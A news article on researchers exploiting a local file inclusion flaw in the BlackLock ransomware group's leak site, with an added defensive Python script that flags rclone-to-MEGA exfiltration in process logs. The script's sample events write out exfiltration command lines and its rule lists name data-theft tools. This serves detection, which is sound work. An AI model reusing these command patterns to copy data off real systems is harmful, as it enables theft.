
BlackLock Ransomware Exposed: Researchers Exploit Data Leak Site Vulnerability



In a striking case of "hacking the hackers," cybersecurity researchers have successfully infiltrated the infrastructure of the notorious BlackLock ransomware group. This breach has unveiled critical insights into the group's operations, exposing vulnerabilities that could be leveraged for future defense strategies.


How Researchers Exploited BlackLock’s Vulnerability

Threat intelligence firm Resecurity discovered a serious security flaw in BlackLock’s Data Leak Site (DLS). This misconfiguration allowed researchers to extract sensitive information, including configuration files, credentials, and a command history that detailed the group's activities.


According to Resecurity, this flaw led to the exposure of clearnet IP addresses associated with BlackLock's hidden infrastructure behind Tor services, revealing crucial operational details. The acquired command history represents one of the most significant OPSEC (Operational Security) failures in the ransomware ecosystem.


BlackLock: A Rebranded Threat on the Rise

BlackLock is a successor to the Eldorado ransomware group and has emerged as one of 2025’s most aggressive extortion syndicates. The group has targeted high-profile sectors, including:

  • Technology

  • Manufacturing

  • Construction

  • Finance

  • Retail


As of February 2025, BlackLock had publicly listed 46 victims across multiple countries, including Argentina, Brazil, Canada, France, Italy, Spain, the U.S., and the U.K.


Affiliate Recruitment and Attack Methods

In January 2025, BlackLock launched an underground affiliate network to recruit cybercriminals, particularly traffers. These individuals play a crucial role in the initial attack phase, directing unsuspecting victims to malicious sites that deploy malware, enabling unauthorized access to systems.



Key Findings from the BlackLock Data Leak

The vulnerability exploited by researchers was identified as a Local File Inclusion (LFI) flaw, which allowed them to retrieve sensitive files and command logs. Some of the most notable discoveries include:

  • Data Exfiltration via Rclone & MEGA Cloud Storage: BlackLock operators used Rclone to transfer stolen data to MEGA cloud storage. In some cases, they even installed the MEGA client directly on victim machines.

  • Disposable MEGA Accounts: The attackers created at least eight MEGA accounts using throwaway email addresses from YOPmail (e.g., zubinnecrouzo-6860@yopmail.com).

  • Links to DragonForce Ransomware: Reverse engineering of BlackLock revealed similarities in source code and ransom notes with a ransomware variant called DragonForce, which has targeted organizations in Saudi Arabia. Notably, DragonForce is coded in Visual C++, while BlackLock is written in Go.

  • Short-lived Mamona Ransomware Operation: A key BlackLock operator, known as $$$, briefly launched a separate ransomware strain called Mamona on March 11, 2025.
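As an added, defender-side example (not from the article or from Resecurity), the script below triages process-creation telemetry for the exfiltration behaviours described above: rclone configured with a MEGA backend, rclone uploads to any remote, MEGA client binaries launched on an endpoint, and a throwaway YOPmail address appearing on a command line. The events, hostnames and user names are constructed; the email address is the one quoted in the article.

```python
import ntpath
import re
import shlex

# Constructed sample process-creation events (not from the article). Each tuple is
# (host, user, command line), the fields a Sysmon Event ID 1 or EDR feed supplies.
SAMPLE_EVENTS = [
    ("ws-042", r"CORP\jdoe", r"C:\Tools\rclone.exe config create box mega user zubinnecrouzo-6860@yopmail.com pass PLACEHOLDER"),
    ("ws-042", r"CORP\jdoe", r"C:\Tools\rclone.exe copy D:\Finance box:2025 --transfers 16"),
    ("ws-042", r"CORP\jdoe", r"C:\Users\jdoe\AppData\Local\MEGAcmd\MEGAcmdServer.exe"),
    ("ws-017", r"CORP\asmith", r"rclone.exe sync C:\Users\asmith\Documents onedrive:Docs"),
    ("srv-db1", r"CORP\svc_sql", r'"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"'),
]

RCLONE_UPLOAD_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
MEGA_BINARIES = {"megacmdserver.exe", "megacmd.exe", "megaclient.exe", "megasync.exe"}
DISPOSABLE_DOMAINS = {"yopmail.com"}              # throwaway provider named in the article
REMOTE_RE = re.compile(r"^:?[A-Za-z0-9_-]{2,}:")  # "name:path" remote; a drive letter D:\ is not


def analyze(cmdline):
    """Return detection tags for one command line (empty list means no finding)."""
    # posix=False keeps Windows backslashes intact; quotes are kept and stripped below.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens:
        return []
    exe = ntpath.basename(tokens[0]).lower()
    args = tokens[1:]
    tags = []
    if exe in MEGA_BINARIES:
        tags.append("mega-client-on-endpoint")
    if exe in ("rclone", "rclone.exe"):
        # "rclone config create <name> mega ..." is the only place the backend type is visible;
        # a later "copy ... <name>:path" does not reveal it, so correlate by host and remote name.
        if args[:2] == ["config", "create"] and len(args) >= 4 and args[3].lower() == "mega":
            tags.append("rclone-mega-remote-configured")
        if any(a in RCLONE_UPLOAD_VERBS for a in args) and any(REMOTE_RE.match(a) for a in args):
            tags.append("rclone-upload-to-remote")
    if any(a.lower().rsplit("@", 1)[-1] in DISPOSABLE_DOMAINS for a in args if "@" in a):
        tags.append("disposable-email-in-cmdline")
    return tags


def scan(events):
    """Run analyze() over (host, user, cmdline) events; return only the flagged ones."""
    findings = []
    for host, user, cmdline in events:
        tags = analyze(cmdline)
        if tags:
            findings.append({"host": host, "user": user, "tags": tags})
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags the first four events and leaves the SQL Server service alone; the `onedrive:` sync is reported as a generic remote upload so that an analyst can decide whether that destination is sanctioned.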


BlackLock DLS Defaced by DragonForce

In a surprising turn of events, BlackLock’s Data Leak Site was hacked and defaced by DragonForce on March 20, 2025. Researchers believe DragonForce may have used the same LFI vulnerability to gain access, posting configuration files and internal chat logs on the site’s homepage. A day earlier, the Mamona ransomware DLS suffered a similar attack.


The Future of BlackLock Ransomware

It remains uncertain whether BlackLock has merged with DragonForce or if the latter has simply taken over its infrastructure. Resecurity speculates that ransomware market consolidation could be at play, with DragonForce absorbing BlackLock’s affiliate network.


Interestingly, BlackLock’s main operator, $$$, has remained silent following these security breaches. This suggests that he may have anticipated the exposure and executed a quiet exit strategy before his operations became fully compromised.


Final Thoughts

The exposure of BlackLock ransomware's infrastructure marks a significant win for the cybersecurity community. With researchers uncovering major OPSEC failures, the incident highlights the growing vulnerabilities even among the most sophisticated cybercriminal groups.


Stay tuned for more updates on the evolving ransomware landscape.